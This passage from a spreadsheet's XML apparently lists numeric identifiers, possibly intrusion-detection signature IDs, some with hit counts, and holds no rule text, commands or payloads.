(1), 41054 (1)</t>
  </si>
  <si>
    <t>254, 1448, 3, 33, 18, 12, 50447, 21232, 44487, 44485, 15, 20, 20212, 51127, 44484, 44486, 44488, 42340, 44489, 5730, 14, 384, 408, 29456, 31767, 43496, 57756, 366, 449, 29957, 372, 1917, 28993, 2924, 14019, 19, 5, 4060, 1, 368, 42944, 32481, 40186, 20528, 27938, 4, 35527, 15306, 50633, 1417, 59258, 1411, 28, 44455, 44416, 1394, 11192, 385, 42017, 16418, 399, 13974, 8, 39488, 28069, 29639, 402, 28556, 46373, 1280, 2049, 25664, 18174, 1201, 57878, 41978, 22, 16282, 2, 11968, 43359, 43362, 42946, 401, 23861, 1616, 43755, 43808, 1413, 382, 37909, 45578, 44679, 38038, 3679, 36650, 29519, 1010, 48894, 16301, 48326, 28557, 7, 12065, 24304, 44651, 373, 369, 895, 13913, 17110, 453, 451, 566, 17152, 6, 37545, 41742, 882, 45941, 381, 6699, 42016, 404, 15850, 2339, 1418, 1420, 48134, 5318, 39320, 12066, 51000, 31136, 23493, 51284, 26, 38381, 16008, 59597, 49040, 35193, 38104, 51333, 30342, 17494, 48331, 31399, 15873, 30490, 18474, 41077, 41186, 579, 27899, 21214, 31341, 2418, 2003, 2004, 28555, 4990, 2050, 65062, 41063, 42255, 1421, 15517, 26989, 35180, 33561, 12632, 28321, 28313, 650, 41075, 41061, 24096, 16510, 1735, 16642, 28039, 18611, 853, 24303, 1447, 17458, 41068, 396, 649, 1136, 34799, 11263, 23362, 31, 26317, 29509, 47082, 41072, 41066, 51344, 24889, 41055, 3822, 20566, 31212, 41074, 41065, 41056, 41057, 41067, 22097, 41071, 41054</t>
  </si>
  <si>
    <t>2001330 (3096254), 2101447 (3026661), 2001329 (3026659), 2002749 (1691786), 2100254 (1051502), 2009768 (518219), 2102466 (314814), 2102465 (301927), 2023997 (235449), 2024766 (155221), 2025992 (148078), 2025649 (148078), 2022218 (134029), 2002752 (91587), 2100384 (76426), 2034857 (61595), 2001117 (54310), 2009767 (51752), 2102925 (50001), 2100366 (44001), 2001972 (38539), 2027759 (35791), 2100372 (19365), 2100486 (18069), 2012709 (13749), 2003595 (13047), 2014384 (12916), 2011716 (11588), 2008578 (10888), 2100368 (8675), 2021630 (7191), 2001331 (5203), 2101917 (4717), 2010937 (4603), 2027865 (3907), 2010935 (2904), 2016149 (2789), 2003099 (2704), 2044666 (2357), 2043304 (2305), 2101417 (2069), 2101411 (1986), 2025650 (1805), 2102924 (1737), 2001219 (1647), 2003020 (1638), 2019401 (1598), 2009582 (1559), 2011411 (1456), 2100385 (1150), 2002948 (1115), 2100469 (970), 2012711 (960), 2100399 (894), 2100615 (855), 2018124 (851), 2100402 (795), 2100408 (746), 2010939 (721), 2031490 (590), 2100312 (570), 2403542 (553), 2101280 (520), 2102049 (492), 2403538 (427), 2403550 (426), 2053892 (396), 2000428 (380), 2030835 (376), 2101620 (370), 2031491 (367), 2010706 (360), 2027390 (345), 2027757 (343), 2003012 (311), 2101616 (294), 2013273 (285), 2010936 (282), 2403678 (272), 2000545 (268), 2000537 (268), 2403543 (263), 2100527 (260), 2053893 (251), 2403551 (240), 2400014 (223), 2027413 (213), 2100401 (201), 2013479 (194), 2100628 (166), 2403578 (161), 2003006 (159), 2403560 (148), 2012710 (143), 2403539 (139), 2031489 (136), 2100524 (127), 2527036 (123), 2036751 (122), 2403540 (118), 2012296 (109), 2100485 (101), 2019102 (101), 2100373 (99), 2100369 (99), 2023640 (94), 2009584 (93), 2100453 (91), 2100566 (85), 2403839 (84), 2009583 (84), 2015856 (83), 2101413 (83), 2403561 (81), 2012712 (77), 2403579 (65), 2049957 (64), 2049956 (64), 2009207 (62), 2001404 (60), 2003068 (59), 2403541 (54), 2100381 (54), 2102336 (52), 2025822 (52), 2011764 (49), 2100404 (47), 2101418 (47), 2000538 (46), 2009205 (41), 2009206 (41), 2403838 (41), 2044665 (41), 2009208 (40), 2403501 (39), 2101420 (38), 2002826 (35), 2013491 (34), 2006409 (33), 2010518 (29), 2527030 (27), 2023753 (25), 2024297 (25), 2001904 (23), 2010938 (22), 2011408 (21), 2400021 (19), 2067085 (18), 2067086 (18), 2067087 (18), 2038967 (17), 2025275 (15), 2027412 (15), 2400032 (14), 2100382 (14), 2522312 (14), 2011368 (13), 2403622 (13), 2016662 (12), 2009151 (11), 2013490 (10), 2102003 (9), 2400005 (8), 2100579 (8), 2400033 (8), 2018585 (7), 2522304 (7), 2001384 (5), 2036223 (5), 2036252 (5), 2050281 (5), 2400060 (4), 2100472 (4), 2003310 (4), 2001608 (4), 2009970 (4), 2100650 (4), 2403826 (4), 2403888 (4), 2100525 (4), 2025712 (3), 2400011 (3), 2100396 (3), 2030390 (3), 2016778 (3), 2100649 (3), 2006408 (3), 2033078 (3), 2403830 (3), 2024217 (2), 2010816 (2), 2008470 (2), 2403878 (2), 2403624 (2), 2100537 (2), 2059172 (2), 2400017 (2), 2400061 (2), 2403416 (2), 2403618 (2), 2029575 (2), 2016683 (2), 2029340 (1), 2100613 (1), 2101852 (1), 2045173 (1), 2036222 (1), 2062460 (1), 2400013 (1), 2100538 (1), 2403677 (1), 2403506 (1), 2403652 (1), 2001353 (1), 2015023 (1), 2001264 (1), 2009886 (1), 2012063 (1), 2527028 (1), 2403596 (1), 2400010 (1), 2014380 (1), 2020632 (1), 2021195 (1), 2403882 (1), 2403616 (1), 2403656 (1), 2024930 (1), 2062459 (1)</t>
  </si>
  <si>
    <t>2001330, 2101447, 2001329, 2002749, 2100254, 2009768, 2102466, 2102465, 2023997, 2024766, 2025992, 2025649, 2022218, 2002752, 2100384, 2034857, 2001117, 2009767, 2102925, 2100366, 2001972, 2027759, 2100372, 2100486, 2012709, 2003595, 2014384, 2011716, 2008578, 2100368, 2021630, 2001331, 2101917, 2010937, 2027865, 2010935, 2016149, 2003099, 2044666, 2043304, 2101417, 2101411, 2025650, 2102924, 2001219, 2003020, 2019401, 2009582, 2011411, 2100385, 2002948, 2100469, 2012711, 2100399, 2100615, 2018124, 2100402, 2100408, 2010939, 2031490, 2100312, 2403542, 2101280, 2102049, 2403538, 2403550, 2053892, 2000428, 2030835, 2101620, 2031491, 2010706, 2027390, 2027757, 2003012, 2101616, 2013273, 2010936, 2403678, 2000545, 2000537, 2403543, 2100527, 2053893, 2403551, 2400014, 2027413, 2100401, 2013479, 2100628, 2403578, 2003006, 2403560, 2012710, 2403539, 2031489, 2100524, 2527036, 2036751, 2403540, 2012296, 2100485, 2019102, 2100373, 2100369, 2023640, 2009584, 2100453, 2100566, 2403839, 2009583, 2015856, 2101413, 2403561, 2012712, 2403579, 2049957, 2049956, 2009207, 2001404, 2003068, 2403541, 2100381, 2102336, 2025822, 2011764, 2100404, 2101418, 2000538, 2009205, 2009206, 2403838, 2044665, 2009208, 2403501, 2101420, 2002826, 2013491, 2006409, 2010518, 2527030, 2023753, 2024297, 2001904, 2010938, 2011408, 2400021, 2067085, 2067086, 2067087, 2038967, 2025275, 2027412, 2400032, 2100382, 2522312, 2011368, 2403622, 2016662, 2009151, 2013490, 2102003, 2400005, 2100579, 2400033, 2018585, 2522304, 2001384, 2036223, 2036252, 2050281, 2400060, 2100472, 2003310, 2001608, 2009970, 2100650, 2403826, 2403888, 2100525, 2025712, 2400011, 2100396, 2030390, 2016778, 2100649, 2006408, 2033078, 2403830, 2024217, 2010816, 2008470, 2403878, 2403624, 2100537, 2059172, 2400017, 2400061, 2403416, 2403618, 2029575, 2016683, 2029340, 2100613, 2101852, 2045173, 2036222, 2062460, 2400013, 2100538, 2403677, 2403506, 2403652, 2001353, 2015023, 2001264, 2009886, 2012063, 2527028, 2403596, 2400010, 2014380, 2020632, 2021195, 2403882, 2403616, 2403656, 2024930, 2062459</t>
  </si>
  <si>
    <t>2001330 (3096254), 2101447 (3026661), 2001329 (3026659), 254 (2422493), 1448 (2158863), 2002749 (1691786), 3 (1540385), 33 (1446594), 18 (1411379), 2100254 (1051502), 12 (869488), 50447 (564756), 2009768 (518219), 21232 (511807), 44487 (453316), 44485 (453316), 15 (449255), 20 (403609), 20212 (393629), 2102466 (314814), 2102465 (301927), 51127 (298171), 44484 (242275), 44486 (242104), 44488 (242102), 2023997 (235449), 42340 (220914), 44489 (214697), 2024766 (155221), 2025992 (148078), 2025649 (148078), 2022218 (134029), 5730 (122607), 2002752 (91587), 14 (78298), 2100384 (76426), 2034857 (61595), 384 (59118), 408 (59021), 29456 (58417), 31767 (54574), 2001117 (54310), 2009767 (51752), 43496 (51446), 2102925 (50001), 2100366 (44001), 57756 (43408), 2001972 (38539), 2027759 (35791), 366 (32973), 449 (26388), 29957 (19846), 2100372 (19365), 2100486 (18069), 372 (17353), 1917 (16887), 28993 (16284), 2012709 (13749), 2924 (13465), 2003595 (13047), 2014384 (12916), 14019 (12318), 2011716 (11588), 2008578 (10888), 19 (8770), 2100368 (8675), 2021630 (7191), 5 (6844), 4060 (6701), 1 (6588), 368 (6579), 2001331 (5203), 42944 (5069), 2101917 (4717), 2010937 (4603), 2027865 (3907), 32481 (3858), 40186 (3170), 2010935 (2904), 2016149 (2789), 20528 (2777), 2003099 (2704), 27938 (2679), 4 (2675), 2044666 (2357), 2043304 (2305), 2101417 (2069), 2101411 (1986), 2025650 (1805), 35527 (1781), 15306 (1750), 2102924 (1737), 2001219 (1647), 2003020 (1638), 2019401 (1598), 2009582 (1559), 50633 (1464), 2011411 (1456), 1417 (1404), 59258 (1386), 1411 (1225), 28 (1154), 2100385 (1150), 44455 (1131), 2002948 (1115), 44416 (1102), 2100469 (970), 2012711 (960), 1394 (957), 2100399 (894), 11192 (872), 2100615 (855), 2018124 (851), 385 (820), 42017 (816), 16418 (816), 2100402 (795), 399 (778), 2100408 (746), 2010939 (721), 13974 (719), 8 (681), 39488 (664), 28069 (623), 29639 (601), 402 (593), 2031490 (590), 2100312 (570), 2403542 (553), 2101280 (520), 28556 (495), 2102049 (492), 46373 (461), 1280 (454), 2049 (431), 2403538 (427), 2403550 (426), 25664 (415), 2053892 (396), 2000428 (380), 2030835 (376), 2101620 (370), 2031491 (367), 18174 (363), 2010706 (360), 1201 (355), 2027390 (345), 2027757 (343), 57878 (335), 41978 (328), 22 (323), 16282 (315), 2003012 (311), 2101616 (294), 2013273 (285), 2010936 (282), 2403678 (272), 2000545 (268), 2000537 (268), 2 (267), 2403543 (263), 2100527 (260), 11968 (254), 2053893 (251), 43359 (250), 43362 (244), 2403551 (240), 2400014 (223), 42946 (215), 2027413 (213), 2100401 (201), 401 (198), 23861 (197), 1616 (196), 43755 (195), 2013479 (194), 43808 (182), 1413 (179), 2100628 (166), 382 (166), 37909 (165), 2403578 (161), 45578 (159), 2003006 (159), 2403560 (148), 44679 (143), 38038 (143), 2012710 (143), 3679 (142), 2403539 (139), 2031489 (136), 36650 (136), 29519 (135), 1010 (135), 2100524 (127), 48894 (126), 16301 (124), 2527036 (123), 2036751 (122), 2403540 (118), 48326 (113), 2012296 (109), 2100485 (101), 2019102 (101), 28557 (100), 2100373 (99), 2100369 (99), 7 (99), 2023640 (94), 2009584 (93), 2100453 (91), 12065 (89), 2100566 (85), 2403839 (84), 2009583 (84), 24304 (83), 44651 (83), 2015856 (83), 2101413 (83), 2403561 (81), 373 (79), 369 (79), 895 (78), 2012712 (77), 13913 (75), 17110 (70), 453 (68), 451 (68), 566 (67), 2403579 (65), 2049957 (64), 2049956 (64), 17152 (63), 2009207 (62), 6 (61), 2001404 (60), 2003068 (59), 37545 (55), 2403541 (54), 2100381 (54), 2102336 (52), 2025822 (52), 41742 (50), 882 (50), 2011764 (49), 2100404 (47), 2101418 (47), 2000538 (46), 45941 (45), 2009205 (41), 2009206 (41), 2403838 (41), 2044665 (41), 2009208 (40), 2403501 (39), 381 (38), 2101420 (38), 6699 (37), 42016 (36), 404 (35), 2002826 (35), 2013491 (34), 15850 (33), 2006409 (33), 2010518 (29), 2339 (28), 1418 (28), 2527030 (27), 1420 (26), 48134 (26), 5318 (26), 39320 (25), 2023753 (25), 12066 (25), 2024297 (25), 2001904 (23), 2010938 (22), 51000 (22), 2011408 (21), 31136 (20), 23493 (20), 51284 (19), 2400021 (19), 26 (18), 38381 (18), 2067085 (18), 2067086 (18), 2067087 (18), 2038967 (17), 16008 (16), 59597 (16), 2025275 (15), 2027412 (15), 2400032 (14), 2100382 (14), 2522312 (14), 49040 (14), 35193 (14), 38104 (13), 51333 (13), 2011368 (13), 30342 (13), 2403622 (13), 2016662 (12), 17494 (12), 48331 (11), 2009151 (11), 31399 (11), 2013490 (10), 15873 (10), 30490 (9), 18474 (9), 2102003 (9), 41077 (8), 2400005 (8), 41186 (8), 579 (8), 2100579 (8), 2400033 (8), 27899 (7), 21214 (7), 31341 (7), 2018585 (7), 2418 (7), 2522304 (7), 2003 (6), 2004 (6), 28555 (6), 4990 (6), 2050 (6), 65062 (5), 2001384 (5), 2036223 (5), 41063 (5), 2036252 (5), 2050281 (5), 2400060 (4), 2100472 (4), 2003310 (4), 42255 (4), 2001608 (4), 2009970 (4), 1421 (4), 2100650 (4), 2403826 (4), 2403888 (4), 15517 (4), 2100525 (4), 26989 (4), 35180 (3), 33561 (3), 12632 (3), 2025712 (3), 28321 (3), 28313 (3), 650 (3), 41075 (3), 41061 (3), 2400011 (3), 2100396 (3), 2030390 (3), 24096 (3), 16510 (3), 1735 (3), 16642 (3), 28039 (3), 2016778 (3), 18611 (3), 2100649 (3), 2006408 (3), 2033078 (3), 2403830 (3), 853 (2), 2024217 (2), 2010816 (2), 24303 (2), 2008470 (2), 2403878 (2), 1447 (2), 2403624 (2), 17458 (2), 2100537 (2), 2059172 (2), 2400017 (2), 41068 (2), 396 (2), 649 (2), 2400061 (2), 2403416 (2), 1136 (2), 2403618 (2), 34799 (2), 2029575 (2), 2016683 (2), 11263 (1), 2029340 (1), 2100613 (1), 2101852 (1), 23362 (1), 31 (1), 2045173 (1), 2036222 (1), 2062460 (1), 26317 (1), 2400013 (1), 29509 (1), 47082 (1), 2100538 (1), 2403677 (1), 2403506 (1), 2403652 (1), 41072 (1), 41066 (1), 2001353 (1), 2015023 (1), 51344 (1), 2001264 (1), 24889 (1), 41055 (1), 3822 (1), 2009886 (1), 2012063 (1), 20566 (1), 31212 (1), 2527028 (1), 2403596 (1), 2400010 (1), 2014380 (1), 2020632 (1), 41074 (1), 41065 (1), 41056 (1), 41057 (1), 41067 (1), 2021195 (1), 2403882 (1), 2403616 (1), 2403656 (1), 22097 (1), 41071 (1), 41054 (1), 2024930 (1), 2062459 (1)</t>
  </si>
  <si>
    <t>2001330, 2101447, 2001329, 254, 1448, 2002749, 3, 33, 18, 2100254, 12, 50447, 2009768, 21232, 44487, 44485, 15, 20, 20212, 2102466, 2102465, 51127, 44484, 44486, 44488, 2023997, 42340, 44489, 2024766, 2025992, 2025649, 2022218, 5730, 2002752, 14, 2100384, 2034857, 384, 408, 29456, 31767, 2001117, 2009767, 43496, 2102925, 2100366, 57756, 2001972, 2027759, 366, 449, 29957, 2100372, 2100486, 372, 1917, 28993, 2012709, 2924, 2003595, 2014384, 14019, 2011716, 2008578, 19, 2100368, 2021630, 5, 4060, 1, 368, 2001331, 42944, 2101917, 2010937, 2027865, 32481, 40186, 2010935, 2016149, 20528, 2003099, 27938, 4, 2044666, 2043304, 2101417, 2101411, 2025650, 35527, 15306, 2102924, 2001219, 2003020, 2019401, 2009582, 50633, 2011411, 1417, 59258, 1411, 28, 2100385, 44455, 2002948, 44416, 2100469, 2012711, 1394, 2100399, 11192, 2100615, 2018124, 385, 42017, 16418, 2100402, 399, 2100408, 2010939, 13974, 8, 39488, 28069, 29639, 402, 2031490, 2100312, 2403542, 2101280, 28556, 2102049, 46373, 1280, 2049, 2403538, 2403550, 25664, 2053892, 2000428, 2030835, 2101620, 2031491, 18174, 2010706, 1201, 2027390, 2027757, 57878, 41978, 22, 16282, 2003012, 2101616, 2013273, 2010936, 2403678, 2000545, 2000537, 2, 2403543, 2100527, 11968, 2053893, 43359, 43362, 2403551, 2400014, 42946, 2027413, 2100401, 401, 23861, 1616, 43755, 2013479, 43808, 1413, 2100628, 382, 37909, 2403578, 45578, 2003006, 2403560, 44679, 38038, 2012710, 3679, 2403539, 2031489, 36650, 29519, 1010, 2100524, 48894, 16301, 2527036, 2036751, 2403540, 48326, 2012296, 2100485, 2019102, 28557, 2100373, 2100369, 7, 2023640, 2009584, 2100453, 12065, 2100566, 2403839, 2009583, 24304, 44651, 2015856, 2101413, 2403561, 373, 369, 895, 2012712, 13913, 17110, 453, 451, 566, 2403579, 2049957, 2049956, 17152, 2009207, 6, 2001404, 2003068, 37545, 2403541, 2100381, 2102336, 2025822, 41742, 882, 2011764, 2100404, 2101418, 2000538, 45941, 2009205, 2009206, 2403838, 2044665, 2009208, 2403501, 381, 2101420, 6699, 42016, 404, 2002826, 2013491, 15850, 2006409, 2010518, 2339, 1418, 2527030, 1420, 48134, 5318, 39320, 2023753, 12066, 2024297, 2001904, 2010938, 51000, 2011408, 31136, 23493, 51284, 2400021, 26, 38381, 2067085, 2067086, 2067087, 2038967, 16008, 59597, 2025275, 2027412, 2400032, 2100382, 2522312, 49040, 35193, 38104, 51333, 2011368, 30342, 2403622, 2016662, 17494, 48331, 2009151, 31399, 2013490, 15873, 30490, 18474, 2102003, 41077, 2400005, 41186, 579, 2100579, 2400033, 27899, 21214, 31341, 2018585, 2418, 2522304, 2003, 2004, 28555, 4990, 2050, 65062, 2001384, 2036223, 41063, 2036252, 2050281, 2400060, 2100472, 2003310, 42255, 2001608, 2009970, 1421, 2100650, 2403826, 2403888, 15517, 2100525, 26989, 35180, 33561, 12632, 2025712, 28321, 28313, 650, 41075, 41061, 2400011, 2100396, 2030390, 24096, 16510, 1735, 16642, 28039, 2016778, 18611, 2100649, 2006408, 2033078, 2403830, 853, 2024217, 2010816, 24303, 2008470, 2403878, 1447, 2403624, 17458, 2100537, 2059172, 2400017, 41068, 396, 649, 2400061, 2403416, 1136, 2403618, 34799, 2029575, 2016683, 11263, 2029340, 2100613, 2101852, 23362, 31, 2045173, 2036222, 2062460, 26317, 2400013, 29509, 47082, 2100538, 2403677, 2403506, 2403652, 41072, 41066, 2001353, 2015023, 51344, 2001264, 24889, 41055, 3822, 2009886, 2012063, 20566, 31212, 2527028, 2403596, 2400010, 2014380, 2020632, 41074, 41065, 41056, 41057, 41067, 2021195, 2403882, 2403616, 2403656, 22097, 41071, 41054, 2024930, 2062459</t>
  </si>
  <si>
    <t>254 (4195140), 1448 (3659753), 42340 (365159), 384 (102526), 408 (102433), 29456 (101390), 449 (53725), 366 (51561), 372 (34810), 1917 (26632), 2924 (13554), 368 (10184), 42944 (6649), 1417 (2550), 1411 (2248), 385 (1387), 1394 (957), 399 (951), 402 (914), 28556 (857), 2049 (573), 1280 (546), 1201 (513), 1616 (358), 41978 (328), 1413 (302), 11968 (254), 1010 (239), 401 (217), 28557 (194), 382 (168), 566 (125), 373 (114), 369 (114), 453 (109), 451 (109), 895 (90), 381 (66), 2339 (61), 404 (58), 1418 (58), 882 (57), 1420 (46), 31136 (34), 2003 (10), 2004 (10), 28555 (10), 2050 (10), 2418 (9), 1447 (8), 579 (8), 27899 (7), 42255 (6), 853 (5), 1421 (5), 396 (5), 650 (4), 649 (3), 1735 (3), 1852 (2), 1546 (2), 1136 (2), 613 (1)</t>
  </si>
  <si>
    <t>254 (4195140), 2001330 (4156710), 1448 (3659753), 3 (2448485), 33 (2307494), 18 (2161957), 12 (1307665), 15 (724578), 20 (676014), 2102466 (392240), 2102465 (377800), 42340 (365159), 2025992 (167303), 2025649 (167303), 14 (113525), 384 (102526), 408 (102433), 29456 (101390), 2100366 (55345), 449 (53725), 366 (51561), 2001972 (51333), 2100372 (45362), 372 (34810), 1917 (26632), 2012709 (17699), 2011716 (13756), 19 (13594), 2924 (13554), 2008578 (12944), 2100368 (10825), 368 (10184), 5 (7706), 42944 (6657), 1 (5984), 2010937 (5587), 2010935 (3620), 2016149 (3212), 1417 (2550), 2101411 (2430), 1411 (2248), 2025650 (2020), 2001219 (1963), 2102924 (1739), 2019401 (1732), 28 (1705), 385 (1387), 2012711 (1352), 2018124 (991), 2010939 (971), 1394 (957), 399 (951), 402 (914), 8 (907), 28556 (857), 22 (628), 2027390 (591), 2049 (573), 2101280 (552), 1280 (546), 1201 (513), 2053892 (446), 2 (429), 2027757 (408), 2010936 (394), 2101616 (369), 1616 (358), 41978 (328), 2015856 (302), 2101413 (302), 1413 (302), 2012710 (284), 2053893 (278), 2027413 (268), 11968 (254), 1010 (239), 401 (217), 2013479 (201), 28557 (194), 382 (168), 6 (153), 2012712 (152), 7 (138), 2002911 (133), 2100566 (133), 566 (125), 2023640 (120), 26 (118), 2100373 (117), 2100369 (117), 373 (114), 369 (114), 453 (109), 451 (109), 2012296 (109), 2019102 (108), 895 (90), 381 (66), 2025822 (65), 2003068 (63), 2339 (61), 404 (58), 1418 (58), 882 (57), 1420 (46), 2025275 (41), 2023753 (39), 2010938 (36), 31136 (34), 2038967 (29), 2024297 (27), 2027412 (24), 2102003 (10), 2003 (10), 2004 (10), 28555 (10), 2050 (10), 2418 (9), 1447 (8), 2100579 (8), 579 (8), 27899 (7), 2018585 (7), 42255 (6), 853 (5), 2036252 (5), 1421 (5), 396 (5), 2050281 (5), 2025712 (4), 650 (4), 2033078 (4), 649 (3), 1735 (3), 2016778 (3), 2012252 (2), 1852 (2), 2024217 (2), 2100537 (2), 1546 (2), 2009099 (2), 1136 (2), 34799 (2), 2029575 (2), 2016683 (2), 2029340 (1), 613 (1), 31 (1), 2100538 (1), 2015023 (1), 4 (1), 2012647 (1), 2014380 (1), 2021195 (1)</t>
  </si>
  <si>
    <t>254, 2001330, 1448, 3, 33, 18, 12, 15, 20, 2102466, 2102465, 42340, 2025992, 2025649, 14, 384, 408, 29456, 2100366, 449, 366, 2001972, 2100372, 372, 1917, 2012709, 2011716, 19, 2924, 2008578, 2100368, 368, 5, 42944, 1, 2010937, 2010935, 2016149, 1417, 2101411, 1411, 2025650, 2001219, 2102924, 2019401, 28, 385, 2012711, 2018124, 2010939, 1394, 399, 402, 8, 28556, 22, 2027390, 2049, 2101280, 1280, 1201, 2053892, 2, 2027757, 2010936, 2101616, 1616, 41978, 2015856, 2101413, 1413, 2012710, 2053893, 2027413, 11968, 1010, 401, 2013479, 28557, 382, 6, 2012712, 7, 2002911, 2100566, 566, 2023640, 26, 2100373, 2100369, 373, 369, 453, 451, 2012296, 2019102, 895, 381, 2025822, 2003068, 2339, 404, 1418, 882, 1420, 2025275, 2023753, 2010938, 31136, 2038967, 2024297, 2027412, 2102003, 2003, 2004, 28555, 2050, 2418, 1447, 2100579, 579, 27899, 2018585, 42255, 853, 2036252, 1421, 396, 2050281, 2025712, 650, 2033078, 649, 1735, 2016778, 2012252, 1852, 2024217, 2100537, 1546, 2009099, 1136, 34799, 2029575, 2016683, 2029340, 613, 31, 2100538, 2015023, 4, 2012647, 2014380, 2021195</t>
  </si>
  <si>
    <t>42944 (6657), 41978 (328), 34799 (2)</t>
  </si>
  <si>
    <t>2025992 (167303), 2025649 (167303), 2025650 (2020), 2102924 (1739), 2015856 (302), 2024297 (27), 2018585 (7), 2012252 (2), 2024217 (2), 2009099 (2), 2029575 (2), 2012647 (1), 2021195 (1)</t>
  </si>
  <si>
    <t>2025992, 2025649, 2025650, 2102924, 2015856, 2024297, 2018585, 2012252, 2024217, 2009099, 2029575, 2012647, 2021195</t>
  </si>
  <si>
    <t>2025992 (167303), 2025649 (167303), 42944 (6657), 2025650 (2020), 2102924 (1739), 41978 (328), 2015856 (302), 2024297 (27), 2018585 (7), 2012252 (2), 2024217 (2), 2009099 (2), 34799 (2), 2029575 (2), 2012647 (1), 2021195 (1)</t>
  </si>
  <si>
    <t>2025992, 2025649, 42944, 2025650, 2102924, 41978, 2015856, 2024297, 2018585, 2012252, 2024217, 2009099, 34799, 2029575, 2012647, 2021195</t>
  </si>
  <si>
    <t>50447 (564756), 44487 (453316), 44485 (453316), 44484 (242275), 44486 (242104), 44488 (242102), 44489 (214697), 57756 (43408), 29957 (19846), 2924 (13465), 14019 (12318), 42944 (5069), 32481 (3858), 40186 (3170), 15306 (1750), 50633 (1464), 59258 (1386), 44455 (1131), 1394 (957), 11192 (872), 16418 (816), 13974 (719), 28069 (623), 29639 (601), 18174 (363), 57878 (335), 41978 (328), 16282 (315), 43359 (250), 43362 (244), 23861 (197), 43755 (195), 44679 (143), 38038 (143), 3679 (142), 29519 (135), 48894 (126), 16301 (124), 12065 (89), 44651 (83), 13913 (75), 37545 (55), 6699 (37), 15850 (33), 5318 (26), 12066 (25), 31136 (20), 23493 (20), 51284 (19), 59597 (16), 49040 (14), 38104 (13), 17494 (12), 31399 (11), 30490 (9), 41186 (8), 28555 (6), 4990 (6), 2050 (6), 42255 (4), 15517 (4), 35180 (3), 33561 (3), 12632 (3), 28321 (3), 28313 (3), 24096 (3), 16510 (3), 1735 (3), 16642 (3), 18611 (3), 17458 (2), 34799 (2), 26317 (1), 29509 (1), 47082 (1), 24889 (1), 20566 (1), 22097 (1)</t>
  </si>
  <si>
    <t>50447, 44487, 44485, 44484, 44486, 44488, 44489, 57756, 29957, 2924, 14019, 42944, 32481, 40186, 15306, 50633, 59258, 44455, 1394, 11192, 16418, 13974, 28069, 29639, 18174, 57878, 41978, 16282, 43359, 43362, 23861, 43755, 44679, 38038, 3679, 29519, 48894, 16301, 12065, 44651, 13913, 37545, 6699, 15850, 5318, 12066, 31136, 23493, 51284, 59597, 49040, 38104, 17494, 31399, 30490, 41186, 28555, 4990, 2050, 42255, 15517, 35180, 33561, 12632, 28321, 28313, 24096, 16510, 1735, 16642, 18611, 17458, 34799, 26317, 29509, 47082, 24889, 20566, 22097</t>
  </si>
  <si>
    <t>2024766 (155221), 2025992 (148078), 2025649 (148078), 2022218 (134029), 2034857 (61595), 2003595 (13047), 2021630 (7191), 2025650 (1805), 2102924 (1737), 2002948 (1115), 2100312 (570), 2010706 (360), 2013273 (285), 2036751 (122), 2015856 (83), 2049957 (64), 2049956 (64), 2009207 (62), 2011764 (49), 2009205 (41), 2009206 (41), 2009208 (40), 2006409 (33), 2010518 (29), 2024297 (25), 2016662 (12), 2009151 (11), 2018585 (7), 2001384 (5), 2003310 (4), 2001608 (4), 2009970 (4), 2030390 (3), 2006408 (3), 2024217 (2), 2029575 (2), 2045173 (1), 2001353 (1), 2001264 (1), 2012063 (1), 2021195 (1), 2024930 (1)</t>
  </si>
  <si>
    <t>2024766, 2025992, 2025649, 2022218, 2034857, 2003595, 2021630, 2025650, 2102924, 2002948, 2100312, 2010706, 2013273, 2036751, 2015856, 2049957, 2049956, 2009207, 2011764, 2009205, 2009206, 2009208, 2006409, 2010518, 2024297, 2016662, 2009151, 2018585, 2001384, 2003310, 2001608, 2009970, 2030390, 2006408, 2024217, 2029575, 2045173, 2001353, 2001264, 2012063, 2021195, 2024930</t>
  </si>
  <si>
    <t>50447 (564756), 44487 (453316), 44485 (453316), 44484 (242275), 44486 (242104), 44488 (242102), 44489 (214697), 2024766 (155221), 2025992 (148078), 2025649 (148078), 2022218 (134029), 2034857 (61595), 57756 (43408), 29957 (19846), 2924 (13465), 2003595 (13047), 14019 (12318), 2021630 (7191), 42944 (5069), 32481 (3858), 40186 (3170), 2025650 (1805), 15306 (1750), 2102924 (1737), 50633 (1464), 59258 (1386), 44455 (1131), 2002948 (1115), 1394 (957), 11192 (872), 16418 (816), 13974 (719), 28069 (623), 29639 (601), 2100312 (570), 18174 (363), 2010706 (360), 57878 (335), 41978 (328), 16282 (315), 2013273 (285), 43359 (250), 43362 (244), 23861 (197), 43755 (195), 44679 (143), 38038 (143), 3679 (142), 29519 (135), 48894 (126), 16301 (124), 2036751 (122), 12065 (89), 44651 (83), 2015856 (83), 13913 (75), 2049957 (64), 2049956 (64), 2009207 (62), 37545 (55), 2011764 (49), 2009205 (41), 2009206 (41), 2009208 (40), 6699 (37), 15850 (33), 2006409 (33), 2010518 (29), 5318 (26), 12066 (25), 2024297 (25), 31136 (20), 23493 (20), 51284 (19), 59597 (16), 49040 (14), 38104 (13), 2016662 (12), 17494 (12), 2009151 (11), 31399 (11), 30490 (9), 41186 (8), 2018585 (7), 28555 (6), 4990 (6), 2050 (6), 2001384 (5), 2003310 (4), 42255 (4), 2001608 (4), 2009970 (4), 15517 (4), 35180 (3), 33561 (3), 12632 (3), 28321 (3), 28313 (3), 2030390 (3), 24096 (3), 16510 (3), 1735 (3), 16642 (3), 18611 (3), 2006408 (3), 2024217 (2), 17458 (2), 34799 (2), 2029575 (2), 2045173 (1), 26317 (1), 29509 (1), 47082 (1), 2001353 (1), 2001264 (1), 24889 (1), 2012063 (1), 20566 (1), 2021195 (1), 22097 (1), 2024930 (1)</t>
  </si>
  <si>
    <t>50447, 44487, 44485, 44484, 44486, 44488, 44489, 2024766, 2025992, 2025649, 2022218, 2034857, 57756, 29957, 2924, 2003595, 14019, 2021630, 42944, 32481, 40186, 2025650, 15306, 2102924, 50633, 59258, 44455, 2002948, 1394, 11192, 16418, 13974, 28069, 29639, 2100312, 18174, 2010706, 57878, 41978, 16282, 2013273, 43359, 43362, 23861, 43755, 44679, 38038, 3679, 29519, 48894, 16301, 2036751, 12065, 44651, 2015856, 13913, 2049957, 2049956, 2009207, 37545, 2011764, 2009205, 2009206, 2009208, 6699, 15850, 2006409, 2010518, 5318, 12066, 2024297, 31136, 23493, 51284, 59597, 49040, 38104, 2016662, 17494, 2009151, 31399, 30490, 41186, 2018585, 28555, 4990, 2050, 2001384, 2003310, 42255, 2001608, 2009970, 15517, 35180, 33561, 12632, 28321, 28313, 2030390, 24096, 16510, 1735, 16642, 18611, 2006408, 2024217, 17458, 34799, 2029575, 2045173, 